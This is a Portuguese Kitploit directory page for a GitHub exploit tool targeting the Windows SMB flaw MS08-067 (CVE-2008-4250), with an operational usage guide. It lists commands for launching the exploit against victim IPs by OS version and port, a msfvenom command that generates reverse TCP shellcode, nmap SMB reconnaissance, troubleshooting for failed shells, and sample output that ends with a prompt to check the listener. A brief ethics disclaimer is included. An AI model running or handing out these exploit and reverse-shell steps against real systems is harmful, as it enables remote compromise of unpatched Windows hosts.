Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Exploit_MS08-067 — MS08-067 | CVE-2008-4250 | Kitploit
Ferramentas/GitHubGitHub/notrustedx/exploit_ms08-067
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoShellcodeTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubnotrustedx/exploit_ms08-067

Exploit_MS08-067

MS08-067 | CVE-2008-4250

Ver Repositório
12há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Guia Completo de Uso: # Exploit MS08-067 Melhorado

📌 Uso Básico

root@kitploit:~
python3 Exploit_MS08-067.py <IP_VÍCTIMA> <VERSIÓN_OS> [OPCIONES]

🎯 Exemplos Práticos

1. Windows XP SP0/SP1 (Porta Padrão 445)

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.100 1

2. Windows 2003 SP1 English (Porta 139)

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.150 4 -p 139

3. Com Shellcode Personalizado

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.200 6 -s /ruta/mishellcode.bin
Baixar ferramenta

🔍 Parâmetros Obrigatórios

ParâmetroDescriçãoValores Válidos
IP_VÍCTIMAIP do alvoQualquer IPv4
VERSIÓN_OSVersão do SO vulnerável1-7 (ver tabela)

📋 Tabela de Versões SUPORTADAS

ValorSistema OperativoArquitetura
1Windows XP SP0/SP1 Universalx86
2Windows 2000 Universalx86
.........

⚙️ Opções Adicionais

OpçãoDescriçãoPadrão
-p/--portPorta SMB (445/139)445
-t/--timeoutTimeout em segundos5
-s/--shellcodeCaminho para shellcode personalizadoNone

🛠️ Geração de Shellcode com msfvenom

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.201 LPORT=4484 \
EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode \
-a x86 --platform windows

🔎 Identificação do Alvo

root@kitploit:~
nmap -p 139,445 --script smb-os-discovery <IP_VÍCTIMA>

🚨 Solução de Problemas Comuns

Erro: STATUS_OBJECT_NAME_NOT_FOUND

  1. Verifique se o serviço Browser está ativo:

    root@kitploit:~
    nmap -p 445 --script smb-enum-shares <IP>
    
  2. Teste com outro pipe (modifique o script):

    root@kitploit:~
    # Cambiar \\pipe\\browser por \\pipe\\srvsvc
    

Shellcode não executa

  • Verifique caracteres proibidos: \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
  • Use este comando para validar:
    root@kitploit:~
     msfvenom -p windows/exec CMD="calc.exe" -f raw | xxd | grep -E "00|0a|0d|5c|5f|2f|2e|40"
    

💡 Recomendações Éticas

✅ Usar apenas em ambientes autorizados
❌ Nunca em sistemas de produção sem permissão

📊 Saída Bem-sucedida Esperada

root@kitploit:~
[*] Targeting 192.168.1.100 | OS: 1 | Port: 445
[+] Connected to 192.168.1.100 on port 445
[*] Sending exploit...
[+] Exploit finished - Check your listener!

⚠️ Nota: Este exploit não funciona em sistemas corrigidos com o boletim MS08-067.